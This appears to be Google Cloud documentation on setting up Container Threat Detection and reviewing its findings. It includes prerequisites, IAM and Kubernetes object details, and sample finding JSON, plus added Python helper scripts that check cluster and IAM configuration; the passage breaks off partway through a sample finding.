Using Container Threat Detection

This page shows how to review Container Threat Detection findings in the Google Cloud console and includes example Container Threat Detection findings. Container Threat Detection is a built-in service for the Security Command Center Premium tier.

To see Container Threat Detection findings, the service must be enabled in the Security Command Center Services settings.

Learn more about viewing and managing Container Threat Detection findings in Reviewing findings on this page.

To enable Container Threat Detection and other Premium-tier detectors at the project level, see Activating Security Command Center for a project.

Using a supported GKE version

To detect potential threats to your containers, make sure your clusters are on a supported Google Kubernetes Engine (GKE) version. Container Threat Detection currently supports the following GKE versions in the Stable, Regular, and Rapid channels:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard and Autopilot >= 1.22
  • GKE Standard and Autopilot >= 1.23

Container Threat Detection supports only Container-Optimized OS node images.
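As an added example that is not part of the original page, the following Python script checks a cluster document against the version list and the Container-Optimized OS requirement above. It assumes the field names of the GKE cluster resource as printed by gcloud container clusters describe CLUSTER --format=json (autopilot.enabled, nodePools[].version, nodePools[].config.imageType, currentMasterVersion); the sample cluster is constructed.

```python
import re

# Minimum supported GKE version per minor release, taken from the list above.
# None means every patch of that minor is supported. Any minor at or above
# OPEN_ENDED_MINOR is supported for both modes ("GKE Standard and Autopilot >= 1.22").
STANDARD_MIN = {
    (1, 15): (1, 15, 9, 12),
    (1, 16): (1, 16, 5, 2),
    (1, 17): None,
    (1, 18): (1, 18, 10, 1400),
    (1, 19): (1, 19, 2, 2000),
    (1, 20): None,
    (1, 21): None,
}
AUTOPILOT_MIN = {
    (1, 21): (1, 21, 11, 900),
}
OPEN_ENDED_MINOR = (1, 22)

# Matches "1.18.10-gke.1400", "1.21.11-gke.900" and a bare "1.17".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-gke\.(\d+))?$")


def parse_gke_version(version: str) -> tuple:
    """Turn a GKE version string into a comparable (major, minor, patch, gke) tuple."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised GKE version: {version!r}")
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def is_supported_version(version: str, autopilot: bool) -> bool:
    """True if this version appears in the supported list for Standard or Autopilot."""
    v = parse_gke_version(version)
    minor = v[:2]
    if minor >= OPEN_ENDED_MINOR:
        return True
    table = AUTOPILOT_MIN if autopilot else STANDARD_MIN
    if minor not in table:
        return False
    floor = table[minor]
    return floor is None or v >= floor


def check_cluster(cluster: dict) -> list:
    """Return human-readable problems for one cluster document (the JSON printed by
    gcloud container clusters describe); an empty list means all node pools qualify."""
    problems = []
    autopilot = bool(cluster.get("autopilot", {}).get("enabled"))
    for pool in cluster.get("nodePools", []):
        name = pool.get("name", "?")
        version = pool.get("version") or cluster.get("currentMasterVersion", "")
        try:
            supported = is_supported_version(version, autopilot)
        except ValueError:
            supported = False
        if not supported:
            problems.append(f"node pool {name}: GKE {version} is not a supported version")
        image = pool.get("config", {}).get("imageType", "")
        if not image.upper().startswith("COS"):
            problems.append(f"node pool {name}: image type {image or 'unknown'} is not Container-Optimized OS")
    return problems


# Constructed sample shaped like the describe output; not a real cluster.
SAMPLE_CLUSTER = {
    "name": "demo-cluster",
    "currentMasterVersion": "1.18.10-gke.1400",
    "autopilot": {"enabled": False},
    "nodePools": [
        {"name": "default-pool", "version": "1.18.10-gke.1400",
         "config": {"imageType": "COS_CONTAINERD"}},
        {"name": "legacy-pool", "version": "1.16.4-gke.1",
         "config": {"imageType": "UBUNTU_CONTAINERD"}},
    ],
}

if __name__ == "__main__":
    for line in check_cluster(SAMPLE_CLUSTER) or ["all node pools meet the prerequisites"]:
        print(line)
```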

Enabling Container Threat Detection

When you activate Security Command Center Premium, Container Threat Detection is enabled by default, unless you choose to disable it during the activation process.

If you need to enable or disable Container Threat Detection for an organization or project, you can do so on the Security Command Center Settings page. For more information, see Enabling or disabling built-in services.

When enabling Container Threat Detection, whether during Security Command Center activation or later, do the following:

  1. For any clusters that are not on a supported GKE version, complete the steps in the guide to upgrade the cluster.
  2. Make sure your clusters provide adequate resources to run the Container Threat Detection DaemonSet.
  3. In the Google Cloud console, review the Container Threat Detection service enablement settings to confirm that Container Threat Detection is enabled for your clusters.

Required IAM permissions

Container Threat Detection requires permissions to enable and disable itself and to manage the Container Threat Detection agent on GKE clusters.

To grant the required permissions, the Container Threat Detection Service Agent IAM role (roles/containerthreatdetection.serviceAgent) must be granted to the Container Threat Detection service agent, which is a type of service account.

Removing this default role from the service agent can stop Container Threat Detection from working correctly.

Depending on how and when Security Command Center was activated, the name of the service agent that Container Threat Detection uses can differ:

  • If Security Command Center was activated before December 7, 2023, Container Threat Detection uses the following user-managed service agent:

    service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.com

  • If Security Command Center was activated at the organization level after December 7, 2023, Container Threat Detection uses the following user-managed, organization-level service agent:

    service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

  • If Security Command Center was activated at the project level after December 7, 2023, Container Threat Detection uses the following user-managed, organization-level service agent:

    service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
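As an added example that is not part of the original page, the following Python check derives the three candidate service agent identities above from a project number and organization ID and scans an IAM policy document (the JSON printed by gcloud projects get-iam-policy PROJECT_ID --format=json or gcloud organizations get-iam-policy ORGANIZATION_ID --format=json) for the roles/containerthreatdetection.serviceAgent binding. The sample policy and the numbers in it are constructed; the organization-level agent is normally bound in the organization's policy, so pass that document when checking it.

```python
CTD_SERVICE_AGENT_ROLE = "roles/containerthreatdetection.serviceAgent"


def candidate_service_agents(project_number: str, organization_id: str) -> dict:
    """The three service agent identities listed above, keyed by activation scenario."""
    return {
        "activated before 2023-12-07":
            f"service-{project_number}@gcp-sa-ktd-control.iam.gserviceaccount.com",
        "organization-level activation after 2023-12-07":
            f"service-org-{organization_id}@gcp-sa-ktd-hpsa.iam.gserviceaccount.com",
        "project-level activation after 2023-12-07":
            f"service-project-{project_number}@gcp-sa-ktd-hpsa.iam.gserviceaccount.com",
    }


def service_agent_role_status(policy: dict, project_number: str, organization_id: str) -> dict:
    """Report, per candidate agent, whether it holds the service agent role in the
    given IAM policy document. Values: "granted", "conditional" (the binding carries
    an IAM condition, so the role may not apply in every context) or None (no binding)."""
    agents = candidate_service_agents(project_number, organization_id)
    status = {label: None for label in agents}
    for binding in policy.get("bindings", []):
        if binding.get("role") != CTD_SERVICE_AGENT_ROLE:
            continue
        members = set(binding.get("members", []))
        for label, email in agents.items():
            if f"serviceAccount:{email}" in members and status[label] != "granted":
                status[label] = "conditional" if binding.get("condition") else "granted"
    return status


def ctd_can_operate(policy: dict, project_number: str, organization_id: str) -> bool:
    """True if at least one candidate agent holds the role unconditionally."""
    return "granted" in service_agent_role_status(policy, project_number, organization_id).values()


# Constructed sample policy; the project number and organization ID are placeholders.
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/viewer", "members": ["user:alice@example.com"]},
        {"role": CTD_SERVICE_AGENT_ROLE,
         "members": ["serviceAccount:service-project-123456789012@gcp-sa-ktd-hpsa.iam.gserviceaccount.com"]},
    ],
    "etag": "BwXyZ=",
    "version": 1,
}

if __name__ == "__main__":
    for label, state in service_agent_role_status(SAMPLE_POLICY, "123456789012", "987654321098").items():
        print(f"{label}: {state or 'no binding'}")
```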

For more information about service agents and IAM roles, see the following:

Checking the GKE cluster configuration

For Container Threat Detection to work, if your cluster is in a Virtual Private Cloud (VPC), its network must meet the routing, firewall, and DNS requirements for communicating with Google services and APIs. To access Google APIs, review the following guides:

In addition, your GKE cluster configuration or organization policy constraints must not block the creation or use of the objects that Container Threat Detection needs in order to work. The following sections list the GKE objects that Container Threat Detection creates and explain how to configure important GKE components to work with Container Threat Detection.

Kubernetes objects

After onboarding, Container Threat Detection creates several GKE objects in enabled clusters. These objects are used to monitor container images, manage privileged containers and pods, and evaluate status to generate findings. The following table lists the objects, their properties, and their key functions.

Each entry lists the object kind, its name (1), its properties, and its function:

Object: ClusterRole
  Name: container-watcher-pod-reader
  Properties: Grants get, watch, and list permissions on pods

Object: ClusterRole
  Name: pod-reader
  Properties: Grants get, watch, and list permissions on pods

Object: ClusterRoleBinding
  Names: container-watcher-pod-reader, gce:podsecuritypolicy:container-watcher
  Properties: Grants the container-watcher-pod-reader and gce:podsecuritypolicy:privileged roles to the container-watcher-pod-reader ServiceAccount

Object: CustomResourceDefinition
  Name: containerwatcherstatuses.containerthreatdetection.googleapis.com
  Function: DaemonSet status reporting

Object: DaemonSet
  Name: container-watcher (2)
  Properties and functions:
    • Privileged: interaction with the Linux Security Module and the container engine
    • Mounts /host/ as read-write: communication with the Linux Security Module
    • Mounts /etc/container-watcher/secrets as read-only to access container-watcher-token: authentication
    • Uses hostNetwork: finding generation
    • Image gke.gcr.io/watcher-daemonset: enabling and upgrading
    • Backend containerthreatdetection-REGION.googleapis.com:443: finding generation

Object: Role
  Name: container-watcher-status-reporter
  Properties: Role with the get, list, watch, create, update, and patch verbs for the CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com
  Function: Allows DaemonSet status information to be updated

Object: RoleBinding
  Name: gce:podsecuritypolicy:container-watcher
  Properties: Grants the gce:podsecuritypolicy:privileged role to the container-watcher-pod-reader ServiceAccount
  Function: Maintains functionality when PodSecurityPolicy is enabled

Object: RoleBinding
  Name: container-watcher-status-reporter
  Properties: Grants the container-watcher-status-reporter role to the container-watcher-pod-reader ServiceAccount

Object: Secret
  Name: container-watcher-token
  Function: Authentication

Object: ServiceAccount
  Name: container-watcher-pod-reader
  Function: Enabling, upgrading, and disabling

(1) All objects are in the kube-system namespace, except container-watcher-pod-reader and gce:podsecuritypolicy:container-watcher.

(2) While Container Threat Detection is being installed, updated, or removed, Kubernetes may emit error messages about Kubernetes objects or other dependencies that are temporarily missing or incomplete. These errors resolve automatically once Container Threat Detection completes the action. Unless the errors persist for more than a few minutes, you can ignore them.

PodSecurityPolicy and admission controllers

PodSecurityPolicy is an admission controller resource that you set up to validate requests to create and update pods in your cluster. Container Threat Detection is compatible with the PodSecurityPolicies that are applied automatically when you create or update a cluster with the enable-pod-security-policy flag. Specifically, Container Threat Detection uses the gce.privileged policy when PodSecurityPolicy is enabled.

If you use custom PodSecurityPolicies or other admission controllers, they must not block the creation or use of the objects that Container Threat Detection needs in order to work. For example, a webhook-based admission controller that rejects or overrides privileged deployments can cause Container Threat Detection to malfunction.

For more information, see Using PodSecurityPolicies.
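As an added example that is not part of the original page or of Google's own tooling, the following Python check validates the container-watcher DaemonSet against the properties in the table above and uses its status counters to surface the admission-controller problem described in this section (pods that an admission webhook or PodSecurityPolicy rejects never become ready). It assumes the JSON layout printed by kubectl get daemonset container-watcher -n kube-system -o json; the sample DaemonSet, including its container and volume names, is constructed.

```python
import json

# Expected properties of the container-watcher DaemonSet, from the table above.
NAMESPACE = "kube-system"
DAEMONSET_NAME = "container-watcher"
IMAGE_PREFIX = "gke.gcr.io/watcher-daemonset"
HOST_MOUNT = "/host"
SECRETS_MOUNT = "/etc/container-watcher/secrets"
TOKEN_SECRET = "container-watcher-token"


def check_container_watcher(ds: dict) -> list:
    """Return a list of problems in a DaemonSet document as printed by kubectl.
    An empty list means the object matches the expected layout and every
    scheduled pod is ready."""
    problems = []
    meta = ds.get("metadata", {})
    if (meta.get("namespace"), meta.get("name")) != (NAMESPACE, DAEMONSET_NAME):
        problems.append(f"object is not {NAMESPACE}/{DAEMONSET_NAME}")

    pod = ds.get("spec", {}).get("template", {}).get("spec", {})
    if not pod.get("hostNetwork"):
        problems.append("hostNetwork is not enabled")
    secret_names = {v["secret"].get("secretName") for v in pod.get("volumes", []) if "secret" in v}
    if TOKEN_SECRET not in secret_names:
        problems.append(f"no volume backed by Secret {TOKEN_SECRET}")

    for c in pod.get("containers", []):
        cname = c.get("name", "?")
        if not c.get("image", "").startswith(IMAGE_PREFIX):
            problems.append(f"container {cname}: unexpected image {c.get('image')}")
        if not c.get("securityContext", {}).get("privileged"):
            problems.append(f"container {cname}: not privileged")
        # Normalise "/host/" and "/host" to the same key before comparing.
        mounts = {m["mountPath"].rstrip("/"): m for m in c.get("volumeMounts", [])}
        if HOST_MOUNT not in mounts:
            problems.append(f"container {cname}: {HOST_MOUNT}/ is not mounted")
        elif mounts[HOST_MOUNT].get("readOnly"):
            problems.append(f"container {cname}: {HOST_MOUNT}/ must be mounted read-write")
        if SECRETS_MOUNT not in mounts:
            problems.append(f"container {cname}: {SECRETS_MOUNT} is not mounted")
        elif not mounts[SECRETS_MOUNT].get("readOnly"):
            problems.append(f"container {cname}: {SECRETS_MOUNT} should be mounted read-only")

    # Pods rejected by an admission webhook or PodSecurityPolicy never become ready,
    # so a ready count below the desired count is the first visible symptom.
    status = ds.get("status", {})
    desired = status.get("desiredNumberScheduled", 0)
    ready = status.get("numberReady", 0)
    if ready < desired:
        problems.append(
            f"only {ready}/{desired} pods ready: check admission webhooks, "
            "PodSecurityPolicy and node resources for anything rejecting privileged pods")
    return problems


# Constructed sample shaped like the kubectl output; the container name, volume
# names, image tag and pod counts are made up for this example.
SAMPLE_DAEMONSET = json.loads(r"""
{
  "apiVersion": "apps/v1", "kind": "DaemonSet",
  "metadata": {"name": "container-watcher", "namespace": "kube-system",
               "labels": {"k8s-app": "container-watcher"}},
  "spec": {"template": {"spec": {
    "hostNetwork": true,
    "containers": [{
      "name": "container-watcher",
      "image": "gke.gcr.io/watcher-daemonset:v0.0.0-example",
      "securityContext": {"privileged": true},
      "volumeMounts": [
        {"name": "host", "mountPath": "/host/"},
        {"name": "secrets", "mountPath": "/etc/container-watcher/secrets", "readOnly": true}
      ]
    }],
    "volumes": [
      {"name": "host", "hostPath": {"path": "/"}},
      {"name": "secrets", "secret": {"secretName": "container-watcher-token"}}
    ]
  }}},
  "status": {"desiredNumberScheduled": 3, "numberReady": 2}
}
""")

if __name__ == "__main__":
    for line in check_container_watcher(SAMPLE_DAEMONSET) or ["DaemonSet looks healthy"]:
        print(line)
```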

Excluding environment variables from Container Threat Detection findings

By default, when Container Threat Detection generates a finding, it reports the environment variables of every process referenced in that finding. Environment variable values can be important when investigating an attack. However, some software packages store secrets and other sensitive information in environment variables. To stop Container Threat Detection from including process environment variables in Container Threat Detection findings, disable the REPORT_ENVIRONMENT_VARIABLES module using the Google Cloud CLI or the Security Command Center API's ContainerThreatDetectionSettings at the organization, folder, or project level.

For example, to disable environment variable reporting in a project, run the following command:

gcloud alpha scc settings services modules disable \
    --service=CONTAINER_THREAT_DETECTION \
    --module=REPORT_ENVIRONMENT_VARIABLES \
    --project=PROJECT_ID

To restore the default behavior, enable environment variable reporting by running:

gcloud alpha scc settings services modules enable \
    --service=CONTAINER_THREAT_DETECTION \
    --module=REPORT_ENVIRONMENT_VARIABLES \
    --project=PROJECT_ID

To see all gcloud alpha scc commands for modules, see gcloud alpha scc settings services modules.

Excluding CLI arguments from Container Threat Detection findings

Every process has one or more command-line (CLI) arguments. By default, when Container Threat Detection includes process details in a finding, it records the process's CLI arguments. CLI argument values can be important when investigating an attack. However, some users pass secrets and other sensitive information in CLI arguments. To stop Container Threat Detection from including process CLI arguments in Container Threat Detection findings, disable the REPORT_CLI_ARGUMENTS module using the Google Cloud CLI or the Security Command Center API's ContainerThreatDetectionSettings at the project, folder, or organization level.

For example, to disable CLI argument reporting in a project, run the following command:

gcloud alpha scc settings services modules disable \
    --service=CONTAINER_THREAT_DETECTION \
    --module=REPORT_CLI_ARGUMENTS \
    --project=PROJECT_ID

To restore the default behavior, enable CLI argument reporting by running:

gcloud alpha scc settings services modules enable \
    --service=CONTAINER_THREAT_DETECTION \
    --module=REPORT_CLI_ARGUMENTS \
    --project=PROJECT_ID

To see all gcloud alpha scc commands for modules, see gcloud alpha scc settings services modules.

Resource usage

Container Threat Detection is designed to have a negligible performance impact on your clusters and should not add latency to any cluster operation.

Resource usage depends on the workload. However, the core Container Threat Detection components, the userspace DaemonSet and the Linux Security Module (LSM), have the following estimated performance impact:

  • DaemonSet: A maximum of 0.125 vCPU and 300 MB of memory, based on hard limits set to cap resource usage. The limits are re-evaluated from time to time and may change to optimize performance, especially for very large nodes.
  • LSM: Varies with workload characteristics, but when stressing the LSM we observed less than 2% CPU and 1% memory. You can test the performance impact by instrumenting your workload with and without Container Threat Detection enabled.

If you are a BigQuery customer, you can enable GKE usage metering to monitor the resource usage of the Container Threat Detection userspace DaemonSet. To find the userspace DaemonSet in usage metering, search for the kube-system namespace and the label k8s-app=container-watcher.

GKE usage metering cannot track kernel CPU usage specifically for the LSM. That data is included in overall CPU usage.

Container Threat Detection API

Container Threat Detection automatically enables the containerthreatdetection API during onboarding to allow findings to be generated. You should not interact directly with this required API. Disabling this API breaks Container Threat Detection's ability to create new findings. If you want to stop receiving Container Threat Detection findings, disable Container Threat Detection in the Security Command Center Services settings.

Reviewing findings

When Container Threat Detection generates findings, you can view them in Security Command Center. If you have configured Continuous Exports to write logs, you can also view findings in Cloud Logging. To generate findings and verify your configuration, you can intentionally trigger a detector and test Container Threat Detection.

Container Threat Detection has the following latencies:

  • Activation latency of 3.5 hours for newly onboarded organizations or projects.
  • Activation latency of minutes for newly created clusters.
  • Detection latency of minutes for threats on activated clusters.

Reviewing findings in the Google Cloud console

IAM roles for Security Command Center can be granted at the organization, folder, or project level. Your ability to view, edit, create, or update findings, assets, and security sources depends on the level at which you are granted access. To learn more about Security Command Center roles, see Access control.

To review Container Threat Detection findings in Security Command Center, follow these steps:

  1. Go to the Security Command Center Findings page in the Google Cloud console.

  2. If necessary, select your Google Cloud organization or project.

  3. Under Quick filters, in the Source display name subsection, select Container Threat Detection.

  4. To view the details of a specific finding, click the finding name under Category. The finding details panel expands to show information about the finding, organized into some or all of the following sections:

    • What was detected: Information about the detected security issue, including an AI-generated summary (Preview) of the issue.
    • Affected resource: Information about the resource where the issue was detected.
    • Security marks: Any security marks your team may have added to the finding.
    • Next steps: Any steps you can take to resolve the issue.
    • Related links: Links to relevant standards, related findings, additional investigation tools, and so on.
    • Detection service: Information about the Security Command Center service, such as Container Threat Detection, that detected the issue, as well as information about the finding itself.
  5. To view the full JSON structure of the finding, click the JSON tab.

For a list of Container Threat Detection findings, see Container Threat Detection detectors.

Viewing findings in Cloud Logging

To view Container Threat Detection findings in Cloud Logging, do the following:

  1. Go to the Logs Explorer page for Cloud Logging in the Google Cloud console.

  2. In the project selector at the top of the page, select the project where you store Container Threat Detection logs.

  3. Click the Query builder tab.

  4. In the Resource drop-down list, select Threat Detector.

    • To view findings from all detectors, select all detector_name.
    • To view findings from a specific detector, select its name.
  5. Alternatively, enter resource.type="threat_detector" in the query builder text box, and then click Run Query.

  6. The table updates with the logs you selected.

  7. Build advanced log queries to specify a set of log entries from any number of logs.

Example finding format

This section covers the JSON format of Container Threat Detection findings.

These examples contain the fields that are most common to all findings. However, not every field appears in every finding. The actual output you see depends on the resource configuration and on the finding's type and state. Information from Kubernetes and containerd is provided on a best-effort basis and is not guaranteed.

For more information about the fields in each finding, see the field descriptions in REST Resource: organizations.sources.findings.

Added Binary Executed

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Binary Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Added_Binary_Kind": "Added",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Process_Arguments": ["BINARY_PATH"],
      "Pod_Name": "POD_NAME",
      "description": "A binary that was not part of the original container image was executed. If an added binary is executed by an attacker, this is a possible sign that an attacker has control of the workload and they are executing arbitrary commands.",
      "Environment_Variables": [
        "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
        "KUBERNETES_SERVICE_PORT\u003d443",
        "HOSTNAME\u003dreconnect-test-4af235e12be6f9d9",
        "HOME\u003d/root",
        "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
        "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        "KUBERNETES_PORT_443_TCP_PORT\u003d443",
        "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
        "DEBIAN_FRONTEND\u003dnoninteractive",
        "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
        "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
        "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
        "PWD\u003d/"
      ],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Added_Binary_Kind": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
    

Added Library Loaded

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Library Loaded",
    "sourceProperties": {
      "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
      "Parent_Pid": 1.0,
      "Container_Name": "CONTAINER_NAME",
      "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Creation_Timestamp": {
        "seconds": 1.618004144E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Pid": 7.0,
      "description": "A library that was not part of the original container image was loaded. If an added library is loaded, this is a possible sign that an attacker has control of the workload and they are executing arbitrary code.",
      "VM_Instance_Name": "INSTANCE_ID",
      "Pod_Namespace": "default",
      "Environment_Variables": [
        "KUBERNETES_SERVICE_PORT\u003d443",
        "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
        "HOSTNAME\u003dsuspicious-library",
        "LD_LIBRARY_PATH\u003d/tmp",
        "PORT\u003d8080",
        "HOME\u003d/root",
        "PYTHONUNBUFFERED\u003d1",
        "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
        "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        "KUBERNETES_PORT_443_TCP_PORT\u003d443",
        "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
        "LANG\u003dC.UTF-8",
        "DEBIAN_FRONTEND\u003dnoninteractive",
        "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
        "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
        "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
        "PWD\u003d/home/vmagent/app"
      ],
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Added_Library_Kind": "Added",
      "Container_Image_Uri": "CONTAINER_IMAGE_URI"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T21:36:13.069Z",
    "createTime": "2021-04-09T21:36:13.267Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Fullpath": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Kind": {
        "primitiveDataType": "STRING"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Execution: Added Malicious Binary Executed

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Added Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T19:51:22.538Z",
    "database": {},
    "eventTime": "2023-11-13T19:51:22.383Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": "CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
        ],
